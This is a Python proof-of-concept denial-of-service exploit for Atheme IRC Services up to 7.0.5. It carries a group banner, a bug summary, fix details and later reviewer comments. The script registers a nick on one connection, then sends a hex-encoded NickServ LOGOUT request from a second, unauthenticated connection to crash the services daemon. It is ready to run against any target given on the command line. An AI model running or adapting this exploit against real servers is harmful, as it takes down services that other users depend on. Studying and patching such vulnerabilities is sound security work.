#!/usr/bin/python3 ################################################################################### # Monday, January 13, 2013 # # # # _ _ .__ .__ # __| || |_| | ____ ____ |__| ____ ____ # \ __ / | _/ __ \ / ___\| |/ _ \ / \ # | || || |_\ ___// /_/ > ( <_> ) | \ # /_ ~~ _\____/\___ >___ /|__|\____/|___| / # |_||_| \/_____/ \/ # http://www.zempirians.com # # 00100011 01101100 01100101 01100111 01101001 01101111 01101110 # # # # -=[ Atheme - IRC Services Daemon ] =- # # [P]roof [o]f [C]oncept, Denial of Service # # # # ################################################################################### # # T E A M # # ####################### # # O_O .....> Sent To Play All Alone <3 # UberLame .....> For Providing More Sweet, Sweet Cycles # Aph3x .....> For Being Awesome # Apetrick .....> For Not Letting Me Play With Him # ################################################################################### # # ~~! SHOUT OUTS !~~ # # a heyoz Eurydemus # nikka l1nd BinaryTENSHi # syk Gatsby # # ~~! Special Thanks !~~ # # Packet Storm Security (www.packetstormsecurity.com) for archiving our # concepts in order to help secure and educate those who read them. # ################################################################################### # SUMMARY # ################ # # Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194 # # Improper implementation of the logout command, results in a segfault # when an unauthenticated user tries to deauth another authenticated user. # ################ # VULNERABLE # ################ # # Atheme Services up to 7.0.5 [and with logout.c loaded (by default)] # ################ # CVE # ################ # # [ No CVE Has Been Reported ] # ################ # PATCH # ################ # # - Proper Fix # - Update To Current Version From GitHub # # - Hot Patch # - Unload nickserv/logout # > /quote operserv modunload nickserv/logout # $ !services.global! Module nickserv/logout unloaded. 
# $ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
#
#                               H O W - T O
#
#######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>
#
###################################################################################
#
# NOTE(review): the remediation is the one already given in the PATCH section of
# the header (update past 7.0.5 / the referenced commit, or unload
# nickserv/logout). Everything this script sends on the wire is either a
# hard-coded byte string or a template filled from the -n/-p arguments, so the
# traffic is constant across runs apart from those two values.

from argparse import ArgumentParser
import socket


# DIRTY HACK TO CONVERT STRINGS TO HEX
def toHex( string_data: str ) -> str:
    """Return the hex digits of each character of *string_data*, concatenated.

    ``hex(ord(ch))`` is taken per character and every ``'0x'`` prefix is
    dropped; the result is spliced into the ``bytes.fromhex`` templates below.
    NOTE(review): ``hex()`` does not zero-pad, so a code point below 0x10
    contributes a single digit and makes the combined string an odd length,
    which ``bytes.fromhex`` rejects; code points above 0xff are not a byte
    encoding at all. Only printable ASCII input round-trips cleanly.
    """
    return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))


def deploy( sock: socket.socket, target: str, port, nick: str, passwd: str ) -> None:
    """Open the second connection and send the request described in the header.

    Args:
        sock: an unconnected TCP socket (created by ``stage``).
        target: host name or address to connect to.
        port: port number; converted with ``int()`` so a str from argparse
            and the int default both work.
        nick: account name spliced into the request via ``toHex``.
        passwd: password spliced into the request via ``toHex``.

    Returns:
        ``None`` — the value of ``sock.close()``.

    Side effects: on any connect failure the bare ``except`` prints a message
    and calls ``exit()``, which raises ``SystemExit`` and ends the whole
    process from inside the caller's loop.
    """
    try:
        sock.connect(( target, int( port ) ))
    except:
        # Bare except: the real reason (DNS, refused, timeout, bad port) is
        # discarded before the process exits.
        print( "\t[-] Payload Deployment Failed!" )
        exit()
    # Two fixed registration lines. These are literal bytes, not derived from
    # the arguments, so the identity this connection presents is the same
    # every run.
    sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
               b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
               b'\x0d\x0a' )
    while True:
        # str() of a bytes object yields its repr ("b'...'"), so the substring
        # test below runs against that repr rather than decoded text.
        # NOTE(review): there is no check for an empty recv() (peer closed);
        # in that case "b''" never contains ' 396 ' and this loop spins.
        host_data = str( sock.recv(4096).strip() )
        if ' 396 ' in host_data:
            # Server numeric the script waits for before sending; the request
            # body is a hex template with nick and passwd spliced in.
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
                       toHex( nick ), toHex( passwd ) ) ) )
            print( '\t[+] Payload Deployed! <3' )
            break
    # Fixed QUIT-style teardown bytes, then close; sock.close() returns None.
    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    return sock.close()


def stage( target: str, port, nick: str, passwd: str ) -> None:
    """Connect, register *nick*, then hand a second socket to ``deploy``.

    Args:
        target: host name or address to connect to.
        port: port number; passed through ``int()`` here and in ``deploy``.
        nick: nickname to register on the first connection.
        passwd: password used in the two services requests sent once the
            server emits the ' 396 ' numeric.

    Returns:
        ``None``.

    Raises:
        ``SystemExit`` (via ``exit()``) if the first connect fails; the bare
        ``except`` hides the underlying error. ``p_sock`` is closed inside
        ``deploy``; ``sock`` is closed at the end of this function.
    """
    sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    # Second socket is only connected later, by deploy().
    p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    try:
        sock.connect(( target, int( port ) ))
    except:
        print( "[-] Failed To Connect To {}".format( target ) )
        exit()
    # NICK line built from the argument through toHex; the USER line is a
    # fixed byte string (same literal as in deploy()).
    sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
               b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
               b'\x3c\x33\x0d\x0a' )
    while True:
        # Same repr-based matching as deploy(); the buffer size differs
        # (8096 here vs 4096 there) for no visible reason. An empty recv()
        # is not detected here either.
        host_data = str( sock.recv( 8096 ).strip() )
        if ' 396 ' in host_data:
            # Two services requests derived from passwd (hex templates), then
            # the second connection is driven by deploy().
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
                       '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )
            print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
            deploy( p_sock, target, port, nick, passwd )
            break
        try:
            # NOTE(review): this branch never fires. `is` compares identity,
            # not equality, so a freshly built str is never `is 'ping'`
            # (CPython also emits a SyntaxWarning for `is` with a literal),
            # and bytes objects have no .format() method. Anything raised
            # here is swallowed by the bare except, so keepalives from the
            # server are silently left unanswered.
            msg = host_data.split()
            if msg[0].lower() is 'ping':
                sock.send( b"PONG {}\r\n".format( msg[1] ) )
        except:
            pass
    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    sock.close()


if __name__ == '__main__':
    # CLI: only -t is required; -P/-n/-p carry defaults. Note the default
    # port is an int while a CLI value arrives as str — both are normalised
    # by int(port) in stage()/deploy(). The -p default is a hard-coded
    # credential baked into the script.
    parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )
    parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )
    parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )
    parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )
    parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )
    args = parser.parse_args()
    if args.target is None:
        parser.print_help()
        exit()
    stage( args.target, args.port, args.nick, args.passwd )